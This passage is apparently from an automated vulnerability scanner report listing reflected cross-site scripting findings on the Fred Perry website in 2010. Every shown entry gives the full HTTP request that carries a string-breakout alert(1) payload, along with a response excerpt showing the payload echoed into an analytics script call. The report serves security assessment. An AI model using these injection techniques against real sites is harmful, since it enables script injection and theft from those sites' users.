The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5799"-alert(1)-"22e462446fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=rj7h8t5kopnlu85l3vbk8n3pk5; expires=Tue, 09-Nov-2010 17:20:55 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/dressesa5799"-alert(1)-"22e462446fd/"); //]]> ...[SNIP]...
1.165. http://www.fredperry.com/limited-edition/women/dresses/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/dresses/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8e44"-alert(1)-"7e71feb7166 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/dresses/?d8e44"-alert(1)-"7e71feb7166=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75686"-alert(1)-"b840be228ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition75686"-alert(1)-"b840be228ba/women/footwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=16bb9ig1cuv3q2ccnvs9bm93m3; expires=Tue, 09-Nov-2010 17:20:39 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition75686"-alert(1)-"b840be228ba/women/footwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c221"-alert(1)-"9b1cf35f8d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=s1avt2mbji989ud1j2vrglcht3; expires=Tue, 09-Nov-2010 17:21:09 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women3c221"-alert(1)-"9b1cf35f8d5/footwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd092"-alert(1)-"6094c8a7c78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:42 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=b6lhr50bikil4piqe70n3448r3; expires=Tue, 09-Nov-2010 17:21:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/footweardd092"-alert(1)-"6094c8a7c78/"); //]]> ...[SNIP]...
1.169. http://www.fredperry.com/limited-edition/women/footwear/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/footwear/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8f77"-alert(1)-"856a7d4a239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/footwear/?a8f77"-alert(1)-"856a7d4a239=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d714e"-alert(1)-"dad4174515e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=i1pbkcdgphrua32fu64cjtdjc7; expires=Tue, 09-Nov-2010 17:21:10 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editiond714e"-alert(1)-"dad4174515e/women/jackets/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b08"-alert(1)-"a3170872b3d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=7b7avsnog7a4k03461pv6n16t4; expires=Tue, 09-Nov-2010 17:21:27 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/womenf9b08"-alert(1)-"a3170872b3d/jackets/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a152f"-alert(1)-"3d9d99bfa20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:21:54 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=6rg1nk1384d1d76b76uptsmhd0; expires=Tue, 09-Nov-2010 17:21:54 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29365
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/jacketsa152f"-alert(1)-"3d9d99bfa20/"); //]]> ...[SNIP]...
1.173. http://www.fredperry.com/limited-edition/women/jackets/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/jackets/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d11e"-alert(1)-"b8edafd3dcd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/jackets/?4d11e"-alert(1)-"b8edafd3dcd=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b961f"-alert(1)-"fcdca4ddcf3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=9s13ojrvlg1gobuv19o3vi9155; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editionb961f"-alert(1)-"fcdca4ddcf3/women/jessica-ogden/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27cbb"-alert(1)-"bdf6fdec2fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=8k235i9lhgm9jn9sgh3r21dfa7; expires=Tue, 09-Nov-2010 17:15:33 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women27cbb"-alert(1)-"bdf6fdec2fd/jessica-ogden/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c68"-alert(1)-"27abae530fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=tid48jmod097u2stfo0nd2a5e2; expires=Tue, 09-Nov-2010 17:15:55 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/jessica-ogdend2c68"-alert(1)-"27abae530fc/"); //]]> ...[SNIP]...
1.177. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/women/jessica-ogden/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf5f1"-alert(1)-"ac5226bfd92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=7mi7u875n0j1fti1hbijatf3m3; expires=Tue, 09-Nov-2010 17:14:18 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29374
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/women/jessica-ogden/?bf5f1"-alert(1)-"ac5226bfd92=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f00fd"-alert(1)-"1af4778c88e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:20:00 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=evuojm770mansedc0kpbmgaum1; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-editionf00fd"-alert(1)-"1af4778c88e/women/knitwear/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2eebd"-alert(1)-"d37ff8bf82b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
